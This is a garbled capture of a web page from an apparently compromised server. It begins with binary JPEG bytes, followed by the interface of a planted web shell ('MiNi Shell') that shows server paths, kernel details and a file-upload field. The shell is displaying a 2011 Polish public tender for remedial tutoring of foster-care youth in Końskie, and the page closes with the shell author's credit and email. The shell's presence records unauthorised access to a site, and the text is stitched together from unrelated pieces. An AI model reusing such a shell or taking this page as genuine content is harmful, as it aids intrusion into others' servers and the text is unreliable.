JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110505/129643-N-2011.html

<p class="kh_header"><b>Końskie: Zorganizowanie zajęć wyrównujących zaległości edukacyjne:
Część 1 Zorganizowanie zajęć wyrównujących zaległości edukacyjne dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15 - 18 lat 
Część 2 Zorganizowanie zajęć wyrównujących zaległości edukacyjne dla usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat 
w związku z realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Końskich projektem systemowym pn. MY SAMODZIELNI, współfinansowanym ze środków Europejskiego Funduszu Społecznego, w ramach POKL</b><br>
<b>Numer ogłoszenia: 129643 - 2011; data zamieszczenia: 05.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie zajęć wyrównujących zaległości edukacyjne:
Część 1 Zorganizowanie zajęć wyrównujących zaległości edukacyjne dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15 - 18 lat 
Część 2 Zorganizowanie zajęć wyrównujących zaległości edukacyjne dla usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat 
w związku z realizowanym przez Powiatowe Centrum Pomocy Rodzinie w Końskich projektem systemowym pn. MY SAMODZIELNI, współfinansowanym ze środków Europejskiego Funduszu Społecznego, w ramach POKL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na: Zorganizowaniu zajęć wyrównujących zaległości edukacyjne dla wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 15 - 18 lat oraz usamodzielnianych wychowanków rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat - Uczestników Projektu MY SAMODZIELNI realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Końskich, współfinansowanego ze środków Europejskiego Funduszu Społecznego, w ramach Programu Operacyjnego Kapitał Ludzki. 
2. Wymagany termin realizacji przedmiotu zamówienia: od dnia podpisania umowy               do 30.11.2011 r.
3. Częstotliwość spotkań: Wykonawca zobowiązany jest do bezpośredniego kontaktu                       z uczestnikami zajęć (w oparciu o dane kontaktowe uzyskane od Zamawiającego), w celu ustalenia z nimi terminów oraz godzin spotkań, z zastrzeżeniem pkt. 2. 
4. Zajęcia mogą odbywać się w grupach tematycznych, liczących maksymalnie 3 osoby.
5. Koszty dojazdu osób prowadzących zajęcia do miejsca zamieszkania niepełnosprawnych Uczestników Projektu, ponosi Wykonawca. 
6. Wykaz rodzaju zajęć wyrównujących zaległości edukacyjne, liczbę godzin dydaktycznych, ilość uczestników oraz miejsce realizacji zajęć dla Uczestników Projektu MY SAMODZIELNI, zawierają poniższe tabele, w podziale na grupy Uczestników Projektu:

-	wychowankowie rodzin zastępczych i placówek opiekuńczo - wychowawczych                    w wieku 15 - 18 lat:
Lp.	Rodzaj korepetycji	Liczba godzin dydaktycznych przypadająca na                1 osobę	Liczba uczestników korepetycji	Ogólna liczba godzin dydaktycznych korepetycji	Miejsce realizacji zajęć
1.	Matematyka	12	13	156	Końskie
2.	Jęz. niemiecki	12	3	36	Końskie
3.	Biologia
	
12	
4	
48	Końskie - 3osoby
Kielce - 1osoba
4.	Chemia
	12	9	108	Końskie - 8 osób
Kielce - 1osoba
5.	Geografia	12	1	12	Końskie
6.	Fizyka	12	12	144	Końskie
7.	Informatyka	12	1	12	Końskie
8.	Jęz. polski
	12	5	60	Luta, gm. Stąporków - 1osoba (miejsce zamieszkania niepełnosprawnego UP),
Końskie - 4 osoby
9.	Rachunkowość	12	1	12	Końskie
10	Jęz. angielski
	12	2	24	Luta, gm. Stąporków - 1osoba
(miejsce zamieszkania niepełnosprawnego UP),
Końskie -1
Ogółem liczba godzin zajęć wyrównujących zaległości edukacyjne:	612	
-	usamodzielniani wychowankowie rodzin zastępczych i placówek opiekuńczo - wychowawczych w wieku 18 - 25 lat:

Lp.	Rodzaj korepetycji	Liczba godzin dydaktycznych przypadająca na 1 osobę	Liczba uczestników korepetycji	Ogólna liczba godzin dydaktycznych korepetycji	Miejsce realizacji zajęć
1.	Matematyka	12	19	228	Kielce - 1osoba
Końskie - 18 osób (w tym dojazd do 1 UP poruszającej się na wózku inwalidzkim do miejscowości Końskie,                           ul. Piaskowa)
2.	Jęz. niemiecki	12	10	120	Końskie - 10 osób, w tym dojazd do 1 UP poruszającej się na wózku inwalidzkim do miejscowości Końskie,                 ul. Piaskowa
3.	Biologia	12	1	12	Końskie 
4.	Chemia	12	3	36	Końskie
5.	Historia	12	1	12	Końskie
6.	Fizyka	12	2	24	Końskie
7.	Ekonomia	12	1	12	Końskie
8.	Jęz. polski	12	2	24	Końskie
9.	Rachunkowość	12	1	12	Kielce
10.	Jęz. angielski
	12	17	192	Kielce - 2 osoby
Końskie - 15 osób
Ogółem liczba godzin zajęć wyrównujących zaległości edukacyjne:	672	

4. Wymogi Zamawiającego dotyczące realizacji przedmiotu zamówienia: 
a) Zajęcia wyrównujące zaległości edukacyjne mają być prowadzone przez osoby posiadające wykształcenie wyższe w zakresie danego przedmiotu. 
b) Wykonawca zobowiązany jest zabezpieczyć dla uczestników sale szkoleniowe wraz                   ze sprzętem niezbędnym do realizacji zajęć (wymóg dotyczący sali nie dotyczy 2 UP,                      w przypadku których zajęcia mają się odbywać w miejscu ich zamieszkania). Sale szkoleniowe powinny spełniać warunki zgodne z przepisami bezpieczeństwa i higieny pracy.
c) Wykonawca zobowiązany jest zakupić i wydać Uczestnikom Projektu pomoce dydaktyczne, niezbędne do przeprowadzenia zajęć:
- w przypadku zajęć z języków obcych - zestaw składający się ze słownika zawierającego               co najmniej 800 stron, repetytorium: 13 zestawów z języka niemieckiego oraz 19 zestawów               z języka angielskiego. 
- w przypadku zajęć z języka polskiego - zestaw składający się ze słownika ortograficznego zawierającego co najmniej 500 stron oraz encyklopedii zawierającej co najmniej 500 stron:                7 zestawów,
- w przypadku pozostałych przedmiotów - zestaw składający się ze zbioru zadań/ćwiczeń zawierającego co najmniej 100 stron, 32 zestawy z matematyki, 5 zestawów z biologii, 12 zestawów z chemii, 1 zestaw z historii, 14 zestawów z fizyki, 1 zestaw z ekonomii, 2 zestawy z rachunkowości, 1 zestaw z geografii, 1 zestaw z informatyki. Zbiory zadań/ćwiczeń mają być dostosowane do możliwości edukacyjnych Uczestników Projektu.
d) Wykonawca opłaci ubezpieczenie NNW dla każdego uczestnika zajęć na kwotę 10.000 zł na jedną osobę.
e) Wykonawca oznaczy miejsca, z których korzystać będą uczestnicy zajęć, poprzez umieszczenie informacji dotyczących projektu oraz współfinansowania przez Unię Europejską (przekazanych przez Zamawiającego).
f) Wykonawca zobowiązany jest prowadzić listy obecności uczestników zajęć oraz dziennika zajęć, zawierającego wymiar godzin i tematykę przeprowadzonych zajęć w ramach poszczególnych przedmiotów. Listy obecności oraz dziennik zajęć powinny być opatrzone logo Unii Europejskiej i Kapitału Ludzkiego, Instytucji Pośredniczącej i PCPR (zgodnie                   ze wzorem dostarczonym przez Zamawiającego) oraz przekazane Zamawiającemu po zakończeniu realizacji umowy
g) Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne, zgodnie z przekazanym przez Zamawiającego wzorem.
h) Wykonawca zobowiązany jest sporządzić dokumentację fotograficzną z prowadzonych zajęć i przekazać ją Zamawiającemu po realizacji zadania.
i) Wykonawca zobowiązany jest przygotować szczegółowy program oraz harmonogram zajęć i przedłożyć go Zamawiającemu, przed rozpoczęciem zajęć..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwie usługi, z których każda polegała na przeprowadzeniu zajęć dydaktycznych i/lub dydaktyczno-wyrównawczych z języków obcych i/lub matematyki i/lub biologii i/lub chemii i/lub geografii i/lub fizyki i/lub informatyki i/lub j. polskiego i/lub rachunkowości i/lub historii i/lub ekonomii, o wartości każdej z usług nie mniejszej niż 30 000,00 zł. brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami: 
a) osobą posiadającą wyższe wykształcenie w zakresie matematyki, 
b) osobą posiadająca wyższe wykształcenie w zakresie języka niemieckiego, 
c) osobą posiadającą wyższe wykształcenie w zakresie języka angielskiego,
d) osobą posiadającą wyższe wykształcenie w zakresie biologii,
e) osobą posiadającą wyższe wykształcenie w zakresie chemii,
f) osobą posiadającą wyższe wykształcenie w zakresie geografii,
g) osobą posiadającą wyższe wykształcenie w zakresie fizyki,
h) osobą posiadającą wyższe wykształcenie w zakresie informatyki,
i) osobą posiadającą wyższe wykształcenie w zakresie j. polskiego,
j) osobą posiadającą wyższe wykształcenie w zakresie rachunkowości,
k) osobą posiadającą wyższe wykształcenie w zakresie historii,
l) osobą posiadającą wyższe wykształcenie w zakresie ekonomii.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w za spełniony, jeżeli Wykonawca wykaże, że znajduje się w sytuacji ekonomicznej              i finansowej zapewniającej wykonanie zamówienia, tj. posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 30 000,00 zł (słownie:  trzydzieści tysięcy  złotych),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy - sporządzone według wzoru stanowiącego Załącznik Nr 3 do SIWZ,
- W przypadku wnoszenia oferty przez Wykonawców występujących wspólnie, Wykonawcy muszą złożyć oświadczenia i dokumenty, o których mowa w Rozdziale V SIWZ, z tym, że dokumenty wymienione w pkt 5.1.6  - 5.1.7 SIWZ (i odpowiednio pkt 5.4) należy złożyć dla każdego wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie zmiany:
-	terminów realizacji zamówienia, w sytuacji wystąpienia zdarzeń natury losowej tj. zdarzeń nagłych, zewnętrznych, które są niezależne od Zamawiającego i Wykonawcy, które stanowią przeszkodę                      w realizacji umowy wg pierwotnego terminu, a których nie można było przewidzieć, ani im zapobiec (siła wyższa),
-	osób, które będą uczestniczyć w wykonywaniu zamówienia (wskazanych w ofercie Wykonawcy), pod warunkami określonymi w § 4 ust. 2 pkt. 1 i 2 wzoru umowy,
-	wysokości wynagrodzenia Wykonawcy za realizacje przedmiotu umowy - w przypadkach określonych w § 10 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.konecki.wrota-swietokrzyskie.pl/web/quest/pcpr<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Konecki/Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie
pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2011 godzina 10:00, miejsce: Powiat Konecki/Powiatowe Centrum Pomocy Rodzinie
ul. Stanisława Staszica 2, 26-200 Końskie
pok. nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII promocja integracji społecznej, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com